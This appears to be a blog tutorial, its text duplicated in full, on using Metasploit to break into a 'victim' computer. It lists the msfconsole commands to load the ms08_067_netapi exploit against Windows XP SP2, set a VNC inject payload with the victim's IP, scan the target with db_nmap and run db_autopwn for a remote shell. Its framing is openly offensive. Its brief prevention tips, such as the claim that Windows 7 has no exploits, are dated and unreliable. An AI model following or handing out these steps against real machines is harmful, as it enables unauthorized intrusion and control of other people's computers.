NOTE: I'm not responsible for anything you do with this info!
I'll not go in deep to make this paper boring :)
Okay so let's begin!
First of all, you would be thinking what is Metasploit?
Metasploit is a framework which allow us to penetest the remote machine to see if its vulnerable to any exploit and if yes, then we can control that remote machine from our own computer.
How it works?
Metasploit works on 3 things -
1. Vulneribility
2. Exploits
3. Payloads
Okay, let me give you a real life example.
Just imagine there's a house which is locked, and a theif comes and if he tries 7-8 combinations of keys then he is able to crack that lock, and get into the house.
=>> Now this thing is called vulneribilty according to Metasploit.
Now the theif tries some combinations of keys and he is able to get into the house successfully.
=>> Now this is called exploit according to Metasploit.
Now it depends on the theif what he wanna do with the house, he can whether steal jwellery, money and any other item present in house. Basically the things that he do after getting in the house.
=>> Now this is called payload according to Metasploit.
Okay now let me explain you this in a hacker's language.
Just imagine you have found a vulnerable computer with XP sp2 as operating system. And there's a exploit available from XP sp2 already.
=>> So this is called vulneribilty.
Now you apply the exploit by providing victim's IP address and any open port.
=>> This is called exploit.
Now you need to send payload in his computer, there are many payloads available in Metasploit from which you can get a shell in victim's pc, capture his keystrokes, control his PC through remote desktop, upload and execute a .EXE file, etc many other things.
=>> This is known as payload.
Now the question is how to use Metasploit?
Hmm, Metasploit is available in two platforms - console (cmd) and GUI (graphical user interface).
Console is the best, so we'll go on it.
Metasploit has different commands for different things.
If you want to see exploit simply type = show exploits.
If you want to see payload, type = show payloads
After setting all options now type = exploit
Okay so now basics are cleared that how Metasploit works. Now lets move on to some higher level, which is hacking ;)
Suppose you have a victim who is running XP SP2 unpatched version, and you have his IP.
Now you need to open msfconsole.
Wait, let it load, it'll take sometime as it has more than 600 exploits and 200 payloads.
Now when it is loaded type cmd = db_driver sqlite3
=>> It'll load the database driver.
Now type = db_create
=>> It'll create a new database.
Type = show exploits
=>> It'll get the list of all exploits currently present in Metasploit database.
Now type = use [exploit name] (we'll use windows/smb/ms08_067_netapi exploits, as we are attacking a XP SP2 machine)
So type = use windows/smb/ms08_067_netapi
=>> It'll load the exploit. Usually all exploits are to be executed on a third party software's security hole. But this exploit is found in the windows XP's system file.
Now you need to select payload, type = show payloads
=>> It'll show you all payloads currently in the database, now we'll use vncinject payload (payload cmd = set PAYLOAD [payload name].
So type = set PAYLOAD windows/vncinject/bind_tcp
Now type = show options
=>> It'll sort out all the options that you need to fill now.
To fill the option the cmd is = set [option name] [your selection(answer)]
You need to fill some options like RHOST, RPORT, LPORT, LHOST, etc. Fill them as I said.
RHOST (remote host) = Remote machine's IP (victim's IP)
To see victim's open port use Nmap to scan his IP and get the open ports. Now when you are done fill all options.
And at last type = exploit
=>> Bangggg! You are done! Now a new windows should be opened, it's like you are in the PC, you can control the whole PC :)
In this paper I'll explain:
1. How does the exploits work.
2. How to prevent your computer from being exploited.
3. How to use autopown function in Metasploit to hack a remote machine.
How does the exploits work?
Exploits are made by finding a security hole in a software. And then we can send our payload to perform different actions.
Exploit writers needs to have very deep knowledge of the software/program in which they are trying to find a security hole to prepare/write an exploit. Usually all exploits are to be executed on a third party software, as the security holes are found in those softwares. But there are also some exploits available to directly attack OS, means the security holes are found in a windows file.
How to prevent your computer from being exploited.
Almost 60% of operating systems are patched till date. And there's no exploit for Win 7 currently. Some anti-viruses can also block some hackers from exploiting your computer.
Though there are some things you can do to prevent your computer from being exploited:
1. Never run any unwanted link.
2. Never turn your AV off even when someone tells you to do so.
3. Don't share your IP with anyone.
4. If you know that the hacker has your IP address and if you have a dynamic IP, simply re-connect your internet connection.
These are some steps you can follow to prevent your computer from being exploited.
_________________________________
Now, I'll explain you how to hack a remote computer just by its IP address. By launching exploit on a third party software in victim's computer.
It works 50% times.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.
Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.
Now launch msfconsole.
It'll take sometime as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load the Nmap up.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!
Voila! Now you can do anything with his PC!
x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
Now the white papers are over for Metasploit, now only tutorials will come >:D<
Again - I'm not responsible for anything you do with this info!
If you have any questions, I'll try to best to help you!
I'll not go in deep to make this paper boring :)
Okay so let's begin!
First of all, you would be thinking what is Metasploit?
Metasploit is a framework which allow us to penetest the remote machine to see if its vulnerable to any exploit and if yes, then we can control that remote machine from our own computer.
How it works?
Metasploit works on 3 things -
1. Vulneribility
2. Exploits
3. Payloads
Okay, let me give you a real life example.
Just imagine there's a house which is locked, and a theif comes and if he tries 7-8 combinations of keys then he is able to crack that lock, and get into the house.
=>> Now this thing is called vulneribilty according to Metasploit.
Now the theif tries some combinations of keys and he is able to get into the house successfully.
=>> Now this is called exploit according to Metasploit.
Now it depends on the theif what he wanna do with the house, he can whether steal jwellery, money and any other item present in house. Basically the things that he do after getting in the house.
=>> Now this is called payload according to Metasploit.
Okay now let me explain you this in a hacker's language.
Just imagine you have found a vulnerable computer with XP sp2 as operating system. And there's a exploit available from XP sp2 already.
=>> So this is called vulneribilty.
Now you apply the exploit by providing victim's IP address and any open port.
=>> This is called exploit.
Now you need to send payload in his computer, there are many payloads available in Metasploit from which you can get a shell in victim's pc, capture his keystrokes, control his PC through remote desktop, upload and execute a .EXE file, etc many other things.
=>> This is known as payload.
Now the question is how to use Metasploit?
Hmm, Metasploit is available in two platforms - console (cmd) and GUI (graphical user interface).
Console is the best, so we'll go on it.
Metasploit has different commands for different things.
If you want to see exploit simply type = show exploits.
If you want to see payload, type = show payloads
After setting all options now type = exploit
Okay so now basics are cleared that how Metasploit works. Now lets move on to some higher level, which is hacking ;)
Suppose you have a victim who is running XP SP2 unpatched version, and you have his IP.
Now you need to open msfconsole.
Wait, let it load, it'll take sometime as it has more than 600 exploits and 200 payloads.
Now when it is loaded type cmd = db_driver sqlite3
=>> It'll load the database driver.
Now type = db_create
=>> It'll create a new database.
Type = show exploits
=>> It'll get the list of all exploits currently present in Metasploit database.
Now type = use [exploit name] (we'll use windows/smb/ms08_067_netapi exploits, as we are attacking a XP SP2 machine)
So type = use windows/smb/ms08_067_netapi
=>> It'll load the exploit. Usually all exploits are to be executed on a third party software's security hole. But this exploit is found in the windows XP's system file.
Now you need to select payload, type = show payloads
=>> It'll show you all payloads currently in the database, now we'll use vncinject payload (payload cmd = set PAYLOAD [payload name].
So type = set PAYLOAD windows/vncinject/bind_tcp
Now type = show options
=>> It'll sort out all the options that you need to fill now.
To fill the option the cmd is = set [option name] [your selection(answer)]
You need to fill some options like RHOST, RPORT, LPORT, LHOST, etc. Fill them as I said.
RHOST (remote host) = Remote machine's IP (victim's IP)
To see victim's open port use Nmap to scan his IP and get the open ports. Now when you are done fill all options.
And at last type = exploit
=>> Bangggg! You are done! Now a new windows should be opened, it's like you are in the PC, you can control the whole PC :)
In this paper I'll explain:
1. How does the exploits work.
2. How to prevent your computer from being exploited.
3. How to use autopown function in Metasploit to hack a remote machine.
How does the exploits work?
Exploits are made by finding a security hole in a software. And then we can send our payload to perform different actions.
Exploit writers needs to have very deep knowledge of the software/program in which they are trying to find a security hole to prepare/write an exploit. Usually all exploits are to be executed on a third party software, as the security holes are found in those softwares. But there are also some exploits available to directly attack OS, means the security holes are found in a windows file.
How to prevent your computer from being exploited.
Almost 60% of operating systems are patched till date. And there's no exploit for Win 7 currently. Some anti-viruses can also block some hackers from exploiting your computer.
Though there are some things you can do to prevent your computer from being exploited:
1. Never run any unwanted link.
2. Never turn your AV off even when someone tells you to do so.
3. Don't share your IP with anyone.
4. If you know that the hacker has your IP address and if you have a dynamic IP, simply re-connect your internet connection.
These are some steps you can follow to prevent your computer from being exploited.
_________________________________
Now, I'll explain you how to hack a remote computer just by its IP address. By launching exploit on a third party software in victim's computer.
It works 50% times.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.
Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.
Now launch msfconsole.
It'll take sometime as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load the Nmap up.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!
Voila! Now you can do anything with his PC!
x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
Now the white papers are over for Metasploit, now only tutorials will come >:D<
Again - I'm not responsible for anything you do with this info!
If you have any questions, I'll try to best to help you!
Posts
No comments:
Post a Comment